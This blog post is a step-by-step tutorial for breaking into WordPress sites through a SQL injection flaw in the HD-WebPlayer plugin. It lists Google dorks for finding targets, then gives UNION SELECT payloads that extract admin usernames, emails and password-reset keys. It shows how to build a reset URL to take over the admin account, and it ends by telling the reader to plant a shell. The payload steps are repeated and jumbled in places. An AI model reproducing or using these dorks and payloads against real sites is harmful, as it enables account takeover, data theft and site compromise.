Hello , After Writing Top 3 Premium Blogger Templates For Free
I was searching for some WordPress Exploits So I Found This Sql Injection Vulnerability In a Plugin Named HD-WebPlayer So now what is the Loop Hole ?
Lets Begin your First Step Is As Always to Find Vulnerable Site Using Google Dorks
For This Exploit Their are 3 Special Dorks :
Dork #1
(config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
Dork #2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
Dork #3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"
Use Google Dork To Find Vulnerable Site Like this :
Now You Found The Site So Lets Try To Inject It .
For Example :
For Example :
http://Site.com/wp-content/plugins/hd-webplayer/config.php?id=2
So Replace It With
http://Site.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--You Have To Add Below Url After Site.Com :
Now When you Replace That Url Website Must Show this Check What I Have Replaced i Commanded Database To Fetch User_login & User_email From Users Table , I Am Not Explaining you SQLi , I will make a tutorial Wait For My Tutorial Or Google About It , So Now Go To Admin Panel Login Page By typing http://Site.com/wp-login.php Or So Replace It With
http://Site.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--You Have To Add Below Url After Site.Com :
wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
http://Site.com/wp-admin
And Click On Lost Your Password ?
After That Either Write Username Or Email Which You Got In Previous Step And Click Enter , Now Again U Have To Get The Authorization Code Which Has Been Sent To Admin's Email now Again U Have To Inject Now Add Below Code After Site Url Like http://Site.Com/
It will Show The Data Of Authorization Code Now U Have To Make Custom Url For Resetting Password Now For Resetting Add This Url After http://Site.com/http://www.
Site.Com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--
wp-login.php?action=rp&key=YOUR_RESET_KEY&login=USERNAME
Now Replace YOUR_RESET_KEY With Authorization Key & USERNAME with Username As I Selected Admin Now It will Ask You To Change Password :) Login To Dashboard And Shell That Site .
Post a Comment
Post a Comment